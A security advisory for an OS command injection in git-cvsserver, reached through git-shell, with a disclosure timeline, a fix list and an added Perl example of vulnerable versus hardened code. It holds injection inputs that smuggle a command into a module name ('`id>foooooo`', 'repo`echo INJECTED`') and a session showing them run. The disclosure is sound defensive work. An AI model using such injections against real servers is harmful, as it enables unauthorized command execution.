Git cvsserver Remote Command Execution

Type packetstorm
Reporter joernchen
Modified 2017-09-28T00:00:00


Phenoelit Advisory <wir-haben-auch-mal-was-gefunden #0815 ++--->  
[ Authors ]  
joernchen <joernchen () phenoelit de>  
Phenoelit Group (  
[ Affected Products ]  
Git before 2.14.2, 2.13.6, 2.12.5, 2.11.4 and 2.10.5 (git-cvsserver)  
[ Vendor communication ]  
2017-09-08 Sent vulnerability details to the git-security list  
2017-09-09 Acknowledgement of the issue, git maintainers ask if  
a patch could be provided  
2017-09-10 Patch is provided  
2017-09-11 Further backtick operations are patched by the git  
maintainers, corrections on the provided patch  
2017-09-11 Revised patch is sent out  
2017-09-11 Jeff King proposes to drop `git-cvsserver`'s default  
invocation from `git-shell`  
2017-09-22 Draft release for git 2.14.2 is created including the  
2017-09-26 Release of this advisory, release of fixed git versions  
[ Description ]  
The `git` subcommand `cvsserver` is a Perl script which makes excessive  
use of the backtick operator to invoke `git`. Unfortunately user input  
is used within some of those invocations.  
It should be noted that `git-cvsserver` is invoked by `git-shell` by  
default, without any further configuration.  
[ Example ]  
Below is an example of an OS command injection within `git-cvsserver`,  
triggered via `git-shell`:  
[git@host ~]$ cat .ssh/authorized_keys  
command="git-shell -c \"$SSH_ORIGINAL_COMMAND\"" ssh-rsa AAAAB3NzaC ....  
[joernchen@host ~]$ ssh git@localhost cvs server  
Root /tmp  
E /tmp/ does not seem to be a valid GIT repository  
error 1 /tmp/ is not a valid repository  
Directory .  
fatal: Not a git repository: '/tmp/'  
Invalid module '`id>foooooo`' at /usr/lib/git-core/git-cvsserver line 3807, <STDIN> line 4.  
[joernchen@host ~]$  
[git@host ~]$ cat foooooo  
uid=619(git) gid=618(git) groups=618(git)  
[git@host ~]$  
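As an added illustration (not part of the original advisory and not git's own code), the Perl backtick pattern described above is shown beside the fork-and-exec-with-argument-list form that the fix switched to. `echo` stands in for the `git` invocation, `safe_pipe_capture` is a rewrite modeled on the helper of that name in `git-cvsserver`, and the module name is a constructed input.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Vulnerable pattern: $module comes from the CVS client and is interpolated
# into a shell command line, so /bin/sh parses any metacharacters in it.
# `echo` is a stand-in for the `git ...` invocation in git-cvsserver.
sub lookup_vulnerable {
    my ($module) = @_;
    return `echo $module`;
}

# Hardened pattern: fork, then exec with an argument list. No shell is
# involved, so $module reaches the child as one literal argument.
# Rewrite modeled on git-cvsserver's safe_pipe_capture (example code).
sub safe_pipe_capture {
    my @cmd = @_;
    my $pid = open(my $fh, '-|');      # forks; child's STDOUT is piped back
    die "fork: $!" unless defined $pid;
    if ($pid == 0) {                    # child
        exec(@cmd) or die "exec @cmd: $!";
    }
    my $out = do { local $/; <$fh> };   # parent: slurp child's output
    close $fh;
    return $out;
}

# Defense in depth: accept only plain path-like module names, with no
# shell metacharacters and no '..' components, before anything is run.
sub valid_module_name {
    my ($module) = @_;
    return 0 unless $module =~ m{\A[A-Za-z0-9._/-]+\z};
    return 0 if grep { $_ eq '..' } split m{/}, $module;
    return 1;
}

# Constructed input carrying a command substitution, like the advisory's.
my $module = 'repo`echo INJECTED`';
printf "accepted by validator: %s\n", valid_module_name($module) ? 'yes' : 'no';
print "backtick form : ", lookup_vulnerable($module);          # shell runs the substitution
print "list-exec form: ", safe_pipe_capture('echo', $module);  # argument passed through verbatim
```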
[ Solution ]  
Upgrade to one of the following git versions:  
* 2.14.2  
* 2.13.6  
* 2.12.5  
* 2.11.4  
* 2.10.5  
[ end of file ]